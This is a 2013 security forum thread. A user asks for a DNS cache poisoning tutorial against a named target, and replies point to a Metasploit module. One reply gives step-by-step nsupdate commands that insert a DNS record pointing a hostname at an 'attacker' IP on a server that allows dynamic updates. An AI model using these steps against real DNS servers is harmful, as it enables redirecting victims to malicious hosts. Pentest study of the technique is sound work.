.

dns

<<

gwocnigeria

Newbie
Newbie

Posts: 1

Joined: Mon Apr 29, 2013 5:08 am

Post Tue May 14, 2013 11:09 am

dns

please i need a demonstration tutorial on how to carry out a sucessfull dns cache poisoning attack on a target www.site.com ip:xx.xx.xx.xx,thanks in advance.
<<

hayabusa

User avatar

Hero Member
Hero Member

Posts: 1662

Joined: Mon Jan 29, 2007 2:59 pm

Post Tue May 14, 2013 12:18 pm

Re: dns

http://lmgtfy.com/?q=dns+cache+poisoning+howto

There are several examples of a dns cache poisoning attack...

First hit is a video, using a metasploit module to accomplish the task.
~ hayabusa ~ 

"All men can see these tactics whereby I conquer, but what none can see is the strategy out of which victory is evolved." - Sun Tzu, 'The Art of War'


OSCE, OSCP , GPEN, C|EH
<<

caissyd

User avatar

Hero Member
Hero Member

Posts: 894

Joined: Thu Dec 31, 2009 11:20 am

Location: Ottawa, Canada

Post Wed May 15, 2013 7:31 am

Re: dns

OSCP, GPEN, GWAPT, GSEC, CEH, CISSP
(aka H1t.M0nk3y)
<<

venom77

User avatar

Hero Member
Hero Member

Posts: 1905

Joined: Mon Dec 11, 2006 3:23 pm

Post Wed Jul 17, 2013 9:03 pm

Re: dns

Slightly off-topic, but there is a quick GUI tool for Linux (I think) that allows you to insert DNS records into a DNS server that allows dynamic updates. Anyone happen to know what that one is? Been a while since I used it.
<<

UKSecurityGuy

User avatar

Jr. Member
Jr. Member

Posts: 88

Joined: Wed Mar 27, 2013 10:51 am

Post Thu Jul 18, 2013 7:43 am

Re: dns

Don't bother with a GUI - the command line is fairly simple, and as it only uses nslookup - the tool to do it is in nearly every system by default anyway! (E.g. compromise internal client, run nslookup from internal client, watch as you get lots of hits on your malicious site)

From the terminal:
>nsupdate <Hit Enter here>
>server <ip address of DNS server>
>prereq yxdomain <Domain you want to add records to>
>update add <FQDN of host we want to add> 86400 A <IP address of attacker>
>send
>quit

Example:
To add the entry for “hacker” to the vuln.hacking domain, and point it towards the attacker on 10.10.10.5

root@bt:~#
>nsupdate
>server 10.10.10.2
>prereq yxdomain vuln.hacking
>update add hacker.vuln.hacking 86400 A 10.10.10.5
>send
>quit

To verify that the DNS record exists

From the terminal:
>nsupdate <Hit Enter here>
>server <DNS server IP address> <address we want to look up>


To Delete the new DNS record

From the terminal:
>nsupdate <Hit Enter here>
>server <ip address of DNS server>
>update delete <FQDN of host we want to delete>
>send
>quit

To verify that the DNS record does not exist anymore

From the terminal:
>nsupdate <Hit Enter here>
>server <DNS server IP address> <address we want to look up>

Return to Web Applications

Who is online

Users browsing this forum: No registered users and 2 guests

cron
.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software